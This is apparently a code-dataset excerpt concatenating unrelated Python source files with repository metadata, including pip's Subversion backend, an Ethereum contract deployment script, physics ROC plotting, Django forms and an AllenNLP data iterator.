def get_url_rev_and_auth(cls, url):
# type: (str) -> Tuple[str, Optional[str], AuthInfo]
# hotfix the URL scheme after removing svn+ from svn+ssh:// readd it
url, rev, user_pass = super(Subversion, cls).get_url_rev_and_auth(url)
if url.startswith('ssh://'):
url = 'svn+' + url
return url, rev, user_pass
@staticmethod
def make_rev_args(username, password):
# type: (Optional[str], Optional[HiddenText]) -> CommandArgs
extra_args = [] # type: CommandArgs
if username:
extra_args += ['--username', username]
if password:
extra_args += ['--password', password]
return extra_args
@classmethod
def get_remote_url(cls, location):
# In cases where the source is in a subdirectory, not alongside
# setup.py we have to look up in the location until we find a real
# setup.py
orig_location = location
while not os.path.exists(os.path.join(location, 'setup.py')):
last_location = location
location = os.path.dirname(location)
if location == last_location:
# We've traversed up to the root of the filesystem without
# finding setup.py
logger.warning(
"Could not find setup.py for directory %s (tried all "
"parent directories)",
orig_location,
)
return None
return cls._get_svn_url_rev(location)[0]
@classmethod
def _get_svn_url_rev(cls, location):
from pip._internal.exceptions import InstallationError
entries_path = os.path.join(location, cls.dirname, 'entries')
if os.path.exists(entries_path):
with open(entries_path) as f:
data = f.read()
else: # subversion >= 1.7 does not have the 'entries' file
data = ''
if (data.startswith('8') or
data.startswith('9') or
data.startswith('10')):
data = list(map(str.splitlines, data.split('\n\x0c\n')))
del data[0][0] # get rid of the '8'
url = data[0][3]
revs = [int(d[9]) for d in data if len(d) > 9 and d[9]] + [0]
elif data.startswith('<?xml'):
match = _svn_xml_url_re.search(data)
if not match:
raise ValueError('Badly formatted data: %r' % data)
url = match.group(1) # get repository URL
revs = [int(m.group(1)) for m in _svn_rev_re.finditer(data)] + [0]
else:
try:
# subversion >= 1.7
# Note that using get_remote_call_options is not necessary here
# because `svn info` is being run against a local directory.
# We don't need to worry about making sure interactive mode
# is being used to prompt for passwords, because passwords
# are only potentially needed for remote server requests.
xml = cls.run_command(
['info', '--xml', location],
show_stdout=False,
)
url = _svn_info_xml_url_re.search(xml).group(1)
revs = [
int(m.group(1)) for m in _svn_info_xml_rev_re.finditer(xml)
]
except InstallationError:
url, revs = None, []
if revs:
rev = max(revs)
else:
rev = 0
return url, rev
@classmethod
def is_commit_id_equal(cls, dest, name):
"""Always assume the versions don't match"""
return False
def __init__(self, use_interactive=None):
# type: (bool) -> None
if use_interactive is None:
use_interactive = is_console_interactive()
self.use_interactive = use_interactive
# This member is used to cache the fetched version of the current
# ``svn`` client.
# Special value definitions:
# None: Not evaluated yet.
# Empty tuple: Could not parse version.
self._vcs_version = None # type: Optional[Tuple[int, ...]]
super(Subversion, self).__init__()
def call_vcs_version(self):
# type: () -> Tuple[int, ...]
"""Query the version of the currently installed Subversion client.
:return: A tuple containing the parts of the version information or
``()`` if the version returned from ``svn`` could not be parsed.
:raises: BadCommand: If ``svn`` is not installed.
"""
# Example versions:
# svn, version 1.10.3 (r1842928)
# compiled Feb 25 2019, 14:20:39 on x86_64-apple-darwin17.0.0
# svn, version 1.7.14 (r1542130)
# compiled Mar 28 2018, 08:49:13 on x86_64-pc-linux-gnu
version_prefix = 'svn, version '
version = self.run_command(['--version'], show_stdout=False)
if not version.startswith(version_prefix):
return ()
version = version[len(version_prefix):].split()[0]
version_list = version.split('.')
try:
parsed_version = tuple(map(int, version_list))
except ValueError:
return ()
return parsed_version
def get_vcs_version(self):
# type: () -> Tuple[int, ...]
"""Return the version of the currently installed Subversion client.
If the version of the Subversion client has already been queried,
a cached value will be used.
:return: A tuple containing the parts of the version information or
``()`` if the version returned from ``svn`` could not be parsed.
:raises: BadCommand: If ``svn`` is not installed.
"""
if self._vcs_version is not None:
# Use cached version, if available.
# If parsing the version failed previously (empty tuple),
# do not attempt to parse it again.
return self._vcs_version
vcs_version = self.call_vcs_version()
self._vcs_version = vcs_version
return vcs_version
def get_remote_call_options(self):
# type: () -> CommandArgs
"""Return options to be used on calls to Subversion that contact the server.
These options are applicable for the following ``svn`` subcommands used
in this class.
- checkout
- export
- switch
- update
:return: A list of command line arguments to pass to ``svn``.
"""
if not self.use_interactive:
# --non-interactive switch is available since Subversion 0.14.4.
# Subversion < 1.8 runs in interactive mode by default.
return ['--non-interactive']
svn_version = self.get_vcs_version()
# By default, Subversion >= 1.8 runs in non-interactive mode if
# stdin is not a TTY. Since that is how pip invokes SVN, in
# call_subprocess(), pip must pass --force-interactive to ensure
# the user can be prompted for a password, if required.
# SVN added the --force-interactive option in SVN 1.8. Since
# e.g. RHEL/CentOS 7, which is supported until 2024, ships with
# SVN 1.7, pip should continue to support SVN 1.7. Therefore, pip
# can't safely add the option if the SVN version is < 1.8 (or unknown).
if svn_version >= (1, 8):
return ['--force-interactive']
return []
def export(self, location, url):
# type: (str, HiddenText) -> None
"""Export the svn repository at the url to the destination location"""
url, rev_options = self.get_url_rev_options(url)
logger.info('Exporting svn repository %s to %s', url, location)
with indent_log():
if os.path.exists(location):
# Subversion doesn't like to check out over an existing
# directory --force fixes this, but was only added in svn 1.5
rmtree(location)
cmd_args = make_command(
'export', self.get_remote_call_options(),
rev_options.to_args(), url, location,
)
self.run_command(cmd_args, show_stdout=False)
def fetch_new(self, dest, url, rev_options):
# type: (str, HiddenText, RevOptions) -> None
rev_display = rev_options.to_display()
logger.info(
'Checking out %s%s to %s',
url,
rev_display,
display_path(dest),
)
cmd_args = make_command(
'checkout', '-q', self.get_remote_call_options(),
rev_options.to_args(), url, dest,
)
self.run_command(cmd_args)
def switch(self, dest, url, rev_options):
# type: (str, HiddenText, RevOptions) -> None
cmd_args = make_command(
'switch', self.get_remote_call_options(), rev_options.to_args(),
url, dest,
)
self.run_command(cmd_args)
def update(self, dest, url, rev_options):
# type: (str, HiddenText, RevOptions) -> None
cmd_args = make_command(
'update', self.get_remote_call_options(), rev_options.to_args(),
dest,
)
self.run_command(cmd_args)
vcs.register(Subversion)
|
[
"ekansh00@gmail.com"
] |
ekansh00@gmail.com
|
ca90f995a08ec8b8293fabb25d6eaccee79943e9
|
289232711dc58677af5642c5a86c64c3cb64f2c6
|
/ProgramFiles/PythonModules/injectContract.py
|
1abb72e065b41872de29d62447cfd5859f492c44
|
[
"Apache-2.0"
] |
permissive
|
buypolarbear/Ethereum_citizen_database
|
097ec2a69ad83e0234c3ddb7a0a243bf6f41b668
|
5f05ece47c1072f818aa9d07da6284857a4d11cf
|
refs/heads/master
| 2020-03-11T07:28:32.147478
| 2018-01-21T22:20:35
| 2018-01-21T22:20:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,603
|
py
|
#!/usr/bin/python
import os
import subprocess
import sys
import time
import signal
import ethereumUtils
#__author__ = "Victor Busque"
def run(contract, username, params, gas = 1000000, printing = True, unlocking = False, tipus = "0"):
if not printing:
ethereumUtils.blockPrint()
bytecodes = []
abis = []
tHs = []
cAs = []
address = ""
password = ""
if (tipus == '0'):
address, password = ethereumUtils.get_user_address_pass(username)
elif (tipus == '1'):
address, password = ethereumUtils.get_user_address_pass_entitat_adm(username)
else:
address, password = ethereumUtils.get_user_address_pass_entitat_sub(username)
if unlocking:
ethereumUtils.unlock_account(address, password) # Not necessary, login already unlocked account.
try:
bytecodes = ethereumUtils.get_compilation_result("bin", contract)
abis = ethereumUtils.get_compilation_result("abi", contract)
except:
print "Error at generating or getting contract bytecode or abi."
return 0
print "number of contracts compiled = " + str(len(bytecodes))
try:
for i in range(0, len(abis)):
ethereumUtils.create_injecting_script(abis[i], bytecodes[i], address, params, gas) #CScript.js created
tH = ethereumUtils.try_injection(i)
os.remove("JsContracts/CScript.js")
if tH == None:
print "Returning 0, maybe no sufficient ether."
return 0
else:
tHs.append(tH) #We still don't have the address
cAs.append(None)
except:
print "Error at injecting contracts"
return 0
i = 0
any_not_mined = False
while (i < len(tHs)): #tHs[i] + abis[i] -> cAs[i]
print "Checking for contract " + str(i) + " mining."
with open("Data/ContractDB.db","a") as cDB:
contract_ = str(username+'~'+abis[i]+'~'+'tH:'+tHs[i]+'~'+'cA:\n')
cDB.write(contract_)
for j in range(0,10):
cA = ethereumUtils.retrieve_contract_address(tHs[i])
if cA != None:
print "----- Contract was mined! -----"
cAs[0] = cA
i+=1
break
else:
print "Contract not mined, check number " + str(j)
time.sleep(1)
if j == 9:
any_not_mined = True
i+=1
if any_not_mined:
print "Not every contract was mined, returning 1"
return 1
else:
print "Every contract was mined, returning 2"
return 2
if __name__ == '__main__':
try:
contract = sys.argv[1]
username = sys.argv[2]
gas = sys.argv[3]
tipus = sys.argv[4]
params = []
if (len(sys.argv) > 5):
params = sys.argv[5:]
run(contract, username, params, gas, tipus = tipus, unlocking = True)
except:
print "Parameters: 1. the '.sol', 2.username, 3. gas, +4. parameters"
sys.exit(1)
|
[
"noreply@github.com"
] |
buypolarbear.noreply@github.com
|
f545d9a6ae0d1478b0ac986620e662b86d89c29c
|
91db25466807baa61233c270e5c286e161dae49c
|
/roc.py
|
eb6d391dd41900c3a3afb90f261b8fa65dd77604
|
[] |
no_license
|
asculac/ElectronID
|
52eab5524086086f35669b3bdaf514f60e9685a2
|
b3a2e3bf41c1f4cf65e36c40c1988375ca910e9e
|
refs/heads/master
| 2023-06-28T15:02:32.465063
| 2023-06-09T13:41:47
| 2023-06-09T13:41:47
| 347,088,051
| 0
| 1
| null | 2023-06-09T13:41:48
| 2021-03-12T14:10:38
|
Python
|
UTF-8
|
Python
| false
| false
| 3,213
|
py
|
from sklearn import metrics
import pandas as pd
from config import cfg
import matplotlib.pyplot as plt
from utils import ROCPlot
import uproot
import numpy as np
from sklearn import linear_model
for location in ["EB1_10", "EB1_5", "EB2_5", "EB2_10", "EE_10", "EE_5"]:
# test_v2 = uproot.open('/home/llr/cms/rembser/data/Egamma/20180323_EleMVATraining/test.root')
# test_v2 = uproot.open('/home/llr/cms/rembser/data/Egamma/20180323_EleMVATraining/train_eval.root')
test_v2 = uproot.open('/home/llr/cms/rembser/data_home/Egamma/20180813_EleMVATraining/train_eval.root')
df_v2 = test_v2["ntuplizer/tree"].pandas.df(["Fall17NoIsoV2Vals", "Fall17IsoV2Vals", "ele_pt", "scl_eta", "matchedToGenEle", "genNpu"], entrystop=None)
df = pd.read_hdf("/home/llr/cms/rembser/EgmIDTraining/out/20180813_EleMVATraining/Fall17NoIsoV2/{}/pt_eta_score.h5".format(location))
df_v2 = df_v2.query(cfg["selection_base"])
df_v2 = df_v2.query(cfg["trainings"]["Fall17IsoV2"][location]["cut"])
df_v2.eval('y = ({0}) + 2 * ({1}) - 1'.format(cfg["selection_bkg"], cfg["selection_sig"]), inplace=True)
df_v2 = df_v2.query("y >= 0")
# So we don't get what was used for V2 training
# df_v2 = df_v2[int(len(df_v2*0.75)):]
df_tmva = pd.read_hdf("/home/llr/cms/rembser/EgmIDTraining/out/20180813_EleMVATraining/Fall17NoIsoV2/{}/legacy/pt_eta_score.h5".format(location))
# df_tmva_noiso = pd.read_hdf("/home/llr/cms/rembser/EgmIDTraining/out/20180813_EleMVATraining/Fall17NoIsoV2/{}/legacy/pt_eta_score.h5".format(location))
# ea = pd.read_csv("effAreaElectrons_cone03_pfNeuHadronsAndPhotons_94X.txt", comment="#", delim_whitespace=True, header=None, names=["eta_min", "eta_max", "ea"])
# df_tmva_noiso["ea"] = 0.0
# for i in range(len(ea))[::-1]:
# df_tmva_noiso.at[abs(df_tmva_noiso["scl_eta"]) < ea.iloc[i]["eta_max"], "ea"] = ea.iloc[i]["ea"]
# def add_hzz_iso(df):
# df["hzz_iso"] = (df["ele_pfChargedHadIso"] + np.clip(df["ele_pfNeutralHadIso"] + df["ele_pfPhotonIso"] - df["rho"]*df["ea"], 0, None)) / df["ele_pt"]
# return df
# df_tmva_noiso = add_hzz_iso(df_tmva_noiso)
# df_tmva_noiso["hzz_iso"].hist(bins=200)
# plt.show()
# regr = linear_model.LogisticRegression()
# regr.fit(df_tmva_noiso[["hzz_iso", "BDT"]], df_tmva_noiso["classID"])
# print('Coefficients: \n', regr.coef_)
# df_tmva_noiso["hzz_seq"] = regr.predict_proba(df_tmva_noiso[["hzz_iso", "BDT"]])[:,1]
# print(df_tmva_noiso)
plt.figure()
roc = ROCPlot(xlim=(0.6,1), ylim=(0.0011, 1), logscale=True, grid=True, percent=True, height_ratios=[1,1], ncol=2, rlim=(0.75, 1.15))
# roc.plot(df_tmva_noiso["classID"] == 1, df_tmva_noiso["hzz_seq"], label="TMVA + iso seq.", color='k')
roc.plot(df_tmva["classID"] == 0, df_tmva["BDT"], label="TMVA")
roc.plot(df_v2["y"] == 1, df_v2["Fall17NoIsoV2Vals"], label="Fall17V2")
roc.plot(df["y"] == 1, df["bdt_score_default"], label="xgb default")
roc.plot(df["y"] == 1, df["bdt_score_bo"], label="xgb bayes_opt")
# plt.show()
plt.savefig("plots/bayes_opt/roc_noiso_{}.pdf".format(location))
plt.savefig("plots/bayes_opt/roc_noiso_{}.png".format(location), dpi=300)
|
[
"mkovac@cern.ch"
] |
mkovac@cern.ch
|
3021bb1ad7c1d4f5bdbd65651af529d05dd7191a
|
9ed7b2cf5721a7473be269433374498ea5c2e4fe
|
/addon.py
|
f86f71c9ae1526ea7c5fa32c158e976701609db7
|
[] |
no_license
|
queeup/service.quartz.tvshelf
|
8358631647de065159ccf36afb374c8e149bc6fd
|
16d496c2b2e496b64a54ad3f64d489589edb27d3
|
refs/heads/master
| 2021-03-19T07:07:46.878378
| 2015-03-13T16:20:40
| 2015-03-13T16:20:40
| 31,160,364
| 0
| 1
| null | 2015-02-23T13:55:54
| 2015-02-22T11:02:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,084
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This script is based on service.library.data.provider
# Thanks to the original authors
import sys
import xbmc
import xbmcgui
import xbmcplugin
import xbmcaddon
if sys.version_info < (2, 7):
import simplejson as json
else:
import json
addon = xbmcaddon.Addon()
addon_version = addon.getAddonInfo('version')
addon_id = addon.getAddonInfo('id')
addon_name = addon.getAddonInfo('name')
import library
LIBRARY = library.LibraryFunctions()
def log(txt):
message = '%s: %s' % (addon_name, txt.encode('ascii', 'ignore'))
xbmc.log(msg=message, level=xbmc.LOGDEBUG)
class Main:
def __init__(self):
self._init_vars()
full_liz = list()
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
self.parse_tvshows(full_liz)
xbmcplugin.addDirectoryItems(int(sys.argv[1]), full_liz)
xbmcplugin.endOfDirectory(handle=int(sys.argv[1]))
def _init_vars(self):
self.USECACHE = True
def parse_tvshows(self, full_liz):
json_query = self._get_data()
while json_query == "LOADING":
xbmc.sleep(100)
json_query = self._get_data()
if json_query:
json_query = json.loads(json_query)
if 'result'in json_query and 'episodes' in json_query['result']:
for item in json_query['result']['episodes']:
liz = xbmcgui.ListItem(item['title'])
liz.setInfo(type="Video", infoLabels={"Title": item['title'],
"Episode": item['episode'],
"Season": item['season'],
})
liz.setProperty("resumetime", str(item['resume']['position']))
liz.setArt(item['art'])
liz.setProperty("fanart_image", item['art'].get('tvshow.fanart', ''))
full_liz.append((item['file'], liz, False))
del json_query
def _get_data(self):
return LIBRARY._fetch_recent_episodes(self.USECACHE)
log('script version %s started' % addon_version)
Main()
log('script version %s stopped' % addon_version)
|
[
"ozgur.baskin@gmail.com"
] |
ozgur.baskin@gmail.com
|
3f153e9ae77aa6a7fc3afd1c82d1936168288a8b
|
5ce6e269e9d879fe2f938adb0e375d6367894409
|
/barinput.py
|
66bf2414991fddc040a39f4c58ae55ce063a9193
|
[] |
no_license
|
Kondapsa/Data_Analytics_with_Software
|
c42cb1dd8631361989e3fff5feedb24efe2364c7
|
92a0627014c32646b8be9d0280c96929762d92f6
|
refs/heads/master
| 2021-05-16T20:03:44.932780
| 2020-03-27T05:36:52
| 2020-03-27T05:36:52
| 250,449,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 404
|
py
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('ggplot')
fil = input("Enter your Excel filename: ")
df = pd.read_excel(fil)
var1 = input("Enter First variable:")
var2 = input("Enter Second variable:")
df1 = df[var1]
df2 = df[var2]
plt.bar(df1,df2,label = 'cars',color = 'c')
plt.xlabel(var1)
plt.ylabel(var2)
plt.title("Bar Graph of cars")
plt.legend()
plt.show()
|
[
"kondapsa@mail.uc.edu"
] |
kondapsa@mail.uc.edu
|
2dbee62c248a9b7e056ac445adf1326652856989
|
38c23b1351e0d13fbfa5eb8742944005b3bb0369
|
/cmh/_version.py
|
4211bfaf77e78dd457ae8b486c79152ac1711a39
|
[
"MIT"
] |
permissive
|
mellesies/cmh
|
cc9075777cab94e406ae0ec3f9b5088b8f5ac1f7
|
efc7f494fd07d92b7e165046fc638323c10673dc
|
refs/heads/master
| 2023-05-04T01:37:56.791130
| 2021-05-27T17:27:26
| 2021-05-27T17:27:26
| 371,015,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 566
|
py
|
import os
import json
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, '__build__')) as fp:
__build__ = json.load(fp)
# Module version
version_info = (1, 0, 0, 'final', __build__)
# Module version stage suffix map
_specifier_ = {
'alpha': 'a',
'beta': 'b',
'candidate': 'rc',
'final': ''
}
# Module version accessible using thomas.__version__
__version__ = '%s.%s.%s%s'%(version_info[0], version_info[1], version_info[2],
'' if version_info[3]=='final' else _specifier_[version_info[3]]+str(version_info[4]))
|
[
"melle.sieswerda@gmail.com"
] |
melle.sieswerda@gmail.com
|
605f7763fe3be2fd9b4ed26ca2583f357599675b
|
f79cd0264ebb906724a1d5bbb8092b392450cee6
|
/publications/migrations/0003_auto_20170507_2028.py
|
2826f52a6ff4128ce1069e6e98151bac8e6f1010
|
[] |
no_license
|
ngabovictor/darsee
|
2a4ade9f15702a3290ce8b9713efc20a3656ffb4
|
9ed00ebf070566353863ed23751c30462858b2af
|
refs/heads/master
| 2021-01-20T14:09:24.018563
| 2017-05-12T23:15:54
| 2017-05-12T23:15:54
| 90,569,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-05-07 20:28
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('publications', '0002_auto_20170507_1842'),
]
operations = [
migrations.AlterField(
model_name='posts',
name='date',
field=models.DateField(default=datetime.datetime(2017, 5, 7, 20, 28, 35, 915847)),
),
migrations.AlterField(
model_name='posts',
name='image',
field=models.FileField(default='Please, use images of the same sizes (dimensions)', upload_to='publications_media'),
),
]
|
[
"nvichack@gmail.com"
] |
nvichack@gmail.com
|
28512c780e8d10cbf5defc8de21ce5dde0c24e1c
|
250f693fb04f6717c2489698d04172bbc64294d7
|
/src/imgur_url.py
|
89bdb2b204ba01ed7a2f9af1cd3885979a1195d5
|
[] |
no_license
|
plasmaofthedawn/amadeus
|
0194c3cf29f1ad9a9a8d1e0a1eba74b4a78d7d81
|
72f511194864b4a72a6cc290afe19b903fbf3f2a
|
refs/heads/master
| 2022-06-29T05:41:57.714880
| 2019-12-04T07:35:06
| 2019-12-04T07:35:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,522
|
py
|
import re
import requests
def get_imgur_urls(starturl):
'''
Scans which kind of imgur url the link is and used the correct
function for returning it.
'''
albumRegEx = r"imgur.com\/a\/([\w\d]*)"
galleryRegEx = r"imgur.com\/gallery\/([\w\d]*)"
singleImageRegEx = r"imgur.com\/([\w\d]{7})"
if re.search(albumRegEx, starturl.replace(' ', '')):
return get_album_urls(starturl.replace(' ', ''))
elif re.search(galleryRegEx, starturl.replace(' ', '')):
return get_gallery_urls(starturl.replace(' ', ''))
elif re.search(singleImageRegEx, starturl.replace(' ', '')):
return get_single_image_url(starturl.replace(' ', ''))
else:
raise ValueError('Not an valid imgur link!')
def get_album_urls(starturl):
return starturl, -1
def get_gallery_urls(starturl):
print("yo gallerys don't work")
return "", -1
def get_single_image_url(starturl):
finishedurl = []
regex = r"href\=\"https://i\.imgur\.com\/([\d\w]*)(\.jpg|\.png|\.gif|\.mp4|\.gifv)"
try:
imgurHTML = requests.get(starturl)
except:
raise Exception('Something failed with the download')
imgurhash = re.findall(regex, imgurHTML.text)
finishedurl.append('https://i.imgur.com/{0}{1}'.format(imgurhash[0][0], imgurhash[0][1]))
return finishedurl, 1
'''
Test URLS:
Album: https://imgur.com/a/3aeC1
SingleImage: https://imgur.com/URyijAU
Gallery: https://imgur.com/gallery/sQJ2h
'''
|
[
"noreply@github.com"
] |
plasmaofthedawn.noreply@github.com
|
37e16f43724c177d1cceecf893194be5b33b4591
|
c7c2fc056025d88a39eb975fb658b41d77dd7d73
|
/dnms/plotmds.py
|
e2ad52c5cd9b817bfa06d5ae6149881e1b781c87
|
[] |
no_license
|
ThomasMiconi/BiologicallyPlausibleLearningRNN
|
f03f602fd657c7d627b2a0e5a41e6b701cdad1a4
|
d8b0835dbcacfd73ee8d41d8054cc7592f4153b2
|
refs/heads/master
| 2021-01-17T15:49:28.598625
| 2019-04-23T21:50:07
| 2019-04-23T21:50:07
| 56,398,297
| 35
| 17
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,520
|
py
|
from pylab import *
import numpy as np
import scipy as sp
import glob
from sklearn import manifold
#from sklearn.metrics import euclidean_distances
if 1:
datalist=[]
labellist=[]
for trialtype in range(4):
print trialtype
#trying 300 ms , total time 1100
#0 : too messy
# 1 : also too messy
# Also too messy.
# Back to 1000 ms, eval time 200, but longer training?
# 0 still seems least bad
fnames = glob.glob('rs_long_type'+str(trialtype)+'*ETA0.1*SEED0.txt')
for nm in fnames:
r = loadtxt(nm)
#z = r.reshape((110,10,200))
#z = sum(z,axis=1)
z = r #r[0::10,:]
datalist.append(z)
#labellist.append([trialtype]*r.shape[0])
labellist.append(trialtype)
matdata = dstack(datalist) ; #+ .5 * standard_normal(matdata.shape)
matdata = matdata[:,:,::2]
NBPTS = matdata.shape[2]
matdata += .0 * standard_normal(shape(matdata))
ion()
fgr, sps = subplots(3, 3)
# 8.5cm = 3.3 inches for single column. 6.9 inches for two-column
#fgr.set_size_inches(3.3, 6)
#fgr.set_facecolor('white')
#slicetimes= [850, 900, 990, 999] #[200, 600, 900 , 850, 990, 999]
slicetimes= [199, 599, 799, 999] #[200, 600, 900 , 850, 990, 999]
subplots_adjust(wspace=0, hspace=.25)
for numgraph in range(4):
tslc = matdata[slicetimes[numgraph],:,:].T
mds = manifold.MDS(n_components=2, max_iter=1000, dissimilarity="euclidean")
pos = mds.fit(tslc).embedding_
ax = sps[numgraph/2,numgraph%2]
ax.set_title(str(1+slicetimes[numgraph])+'ms', size=10)
ax.plot(pos[0:NBPTS/4-1, 0], pos[0:NBPTS/4-1, 1], 'oc', markersize=8)
ax.plot(pos[NBPTS/4:2*NBPTS/4-1, 0], pos[NBPTS/4:2*NBPTS/4-1, 1], 'or', markersize=8)
ax.plot(pos[2*NBPTS/4:3*NBPTS/4-1, 0], pos[2*NBPTS/4:3*NBPTS/4-1, 1], 'og', markersize=8)
ax.plot(pos[3*NBPTS/4:NBPTS-1, 0], pos[3*NBPTS/4:NBPTS-1, 1], 'oy', markersize=8)
if numgraph==0 or numgraph==2:
ax.set_ylabel('Dimension 2', size=10)
if numgraph==2 or numgraph==3:
ax.set_xlabel('Dimension 1', size=10)
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_xlim(-10,10)
ax.set_ylim(-10,10)
ax.set_aspect('equal', 'box')
sps[2,0].axis('off')
sps[2,1].axis('off')
sps[0,2].axis('off')
sps[1,2].axis('off')
sps[2,2].axis('off')
sps[0,1].legend(['AA','AB', 'BA', 'BB'], numpoints = 1, ncol= 1, loc=3, prop={'size':10}, bbox_to_anchor=(1.1,-.5))
savefig('figure_mds.png', bbox_inches='tight', dpi=300)
draw()
|
[
"thomas.miconi@gmail.com"
] |
thomas.miconi@gmail.com
|
a48da3eaff7e1dff747a208dd161e8ffcf6e796f
|
9c6cf3f14042d8b9c6b6153b74451b76cd352531
|
/curation/forms.py
|
a30163227736eab73f0675be5ffe881149f30aab
|
[] |
no_license
|
manshon/djangoApp
|
8c48ad0d9fece2d5458e1c75208366342eff5200
|
e13e4c3b908eb68abaeea41a136d2fa50a75b133
|
refs/heads/master
| 2020-03-11T23:57:25.384100
| 2018-05-16T07:33:51
| 2018-05-16T07:33:51
| 130,336,641
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,108
|
py
|
from django import forms
from .models import Comment, Community, Article
class ArticleCommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = (
'body',
)
class ArticleCreateForm(forms.ModelForm):
class Meta:
model = Article
fields = (
'title',
'body',
'thumbnail',
'is_public',
)
class ArticleEditForm(forms.ModelForm):
class Meta:
model = Article
fields = (
'title',
'body',
'thumbnail',
'is_public',
)
class ArticleSearchForm(forms.ModelForm):
search_word = forms.CharField(label='検索ワード')
class Meta:
model = Article
fields = ()
class CommunityCreateForm(forms.ModelForm):
class Meta:
model = Community
fields = (
'name',
'description',
)
class CommunityEditForm(forms.ModelForm):
class Meta:
model = Community
fields = (
'name',
'description',
)
|
[
"mansho538552@gmail.com"
] |
mansho538552@gmail.com
|
43ae6d6bf326964c6a7d764f1a189bfbed192d6a
|
1ce4c0961f63e037e2a7da46f3e81d804b6e19b0
|
/5_dict.py
|
ce48919d27435387fbd499b5fdeae50b99cb656d
|
[] |
no_license
|
alexmudra/python_experiments
|
256b6a5996f603034cf81ac2dd1565976efe07ad
|
31c91905611dee9cc13dbf37e7c0cfbf9ca0173f
|
refs/heads/master
| 2023-04-06T07:50:00.407452
| 2023-04-02T17:38:49
| 2023-04-02T17:38:49
| 154,693,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 605
|
py
|
phones = [
{'brand': 'samsung','model':'a7','display_width':1980, 'display_heith':1080,'is_gprs':'Yes', 'is_wi-fi':'Yes'},
{'brand': 'iphone','model':7,'display_width':2200, 'display_heith':1080,'is_gprs':'Yes' ,'is_wi-fi':'Yes'},
{'brand': 'xiaomy','model':8,'display_width':2200,'display_heith':1080,'is_gprs':'Yes','is_wi-fi':'Yes'},
{'brand': 'nokia','model':6.01,'display_width':1800,'display_heith':900,'is_gprs':'Yes','is_wi-fi':'Yes'}
]
for i in phones:
if i['display_width'] > 1900 & i["display_heith"] >= 1000:
print("dslfklsdkf")
|
[
"alexander.kobko@gmail.com"
] |
alexander.kobko@gmail.com
|
0953b5059310c24ba91ffec1812f216ca631cb80
|
ebec36b608bd0dc1040fb1a3dc172de43568f85a
|
/bella_allen_nlp/iterators/augmented_iterator.py
|
27ce07315612057f6bc64b4d6f93bc08e0e6bdd0
|
[] |
no_license
|
apmoore1/Bella-AllenNLP
|
2b887f2b268886186511292cdba27dd50e1bd686
|
55f5474629de948ccd5592d997aa7343b06db8e3
|
refs/heads/master
| 2020-03-30T18:14:05.703041
| 2019-07-22T08:25:59
| 2019-07-22T08:25:59
| 151,490,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,624
|
py
|
from collections import deque
from typing import Iterable, Deque
import logging
import random
from allennlp.common.util import lazy_groups_of
from allennlp.data.instance import Instance
from allennlp.data.iterators.data_iterator import DataIterator
from allennlp.data.dataset import Batch
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
@DataIterator.register("augmented")
class AugmentedIterator(DataIterator):
"""
Augmented iterator that takes a dataset and selects the data to return
based on the epoch number associated to the samples in the dataset and the
epoch the iterator is currently on. It can also shuffle the dataset. This
requires the dataset to be pre-processed and have a field called
`epoch_to_be_selected_on` where that field contains a list of unique numbers
where each number would suggest which epoch that sample will be within.
This iterator will then generate fixed sized batches. It takes the same
parameters as :class:`allennlp.data.iterators.DataIterator`
It also overrides the `get_num_batches` function as the whole dataset is
never used only a sub-sample is used based on the the samples chosen at
each epoch.
"""
def _create_batches(self, instances: Iterable[Instance], shuffle: bool) -> Iterable[Batch]:
# First break the dataset into memory-sized lists:
epoch_number = self._epochs[id(instances)]
filtered_instances = []
for instance in instances:
if 'epoch_numbers' in instance.fields:
epoch_numbers = instance.fields['epoch_numbers'].array
if epoch_number in epoch_numbers:
filtered_instances.append(instance)
continue
elif -1 in epoch_numbers:
filtered_instances.append(instance)
continue
else:
continue
filtered_instances.append(instance)
for instance_list in self._memory_sized_lists(filtered_instances):
if shuffle:
random.shuffle(instance_list)
iterator = iter(instance_list)
excess: Deque[Instance] = deque()
# Then break each memory-sized list into batches.
for batch_instances in lazy_groups_of(iterator, self._batch_size):
for possibly_smaller_batches in self._ensure_batch_is_sufficiently_small(batch_instances, excess):
batch = Batch(possibly_smaller_batches)
yield batch
if excess:
yield Batch(excess)
def get_num_batches(self, instances: Iterable[Instance]) -> int:
"""
The way this needs to be changed is that we could iterate through the
instances and count the number in the current epoch? Don't know
how slow this would be through?
Returns the number of batches that ``dataset`` will be split into; if you want to track
progress through the batch with the generator produced by ``__call__``, this could be
useful.
"""
return 1
# epoch_number = self._epochs[id(instances)]
# if is_lazy(instances) and self._instances_per_epoch is None:
# # Unable to compute num batches, so just return 1.
# return 1
# elif self._instances_per_epoch is not None:
# return math.ceil(self._instances_per_epoch / self._batch_size)
# else:
# # Not lazy, so can compute the list length.
# return math.ceil(len(ensure_list(instances)) / self._batch_size)
|
[
"andrew.p.moore94@gmail.com"
] |
andrew.p.moore94@gmail.com
|
61cd43ec55031aa1e4ae0113843c9c55444e359b
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/sieve-big-9886.py
|
03cdd03c620df30c28f585f25b600d57880919f5
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
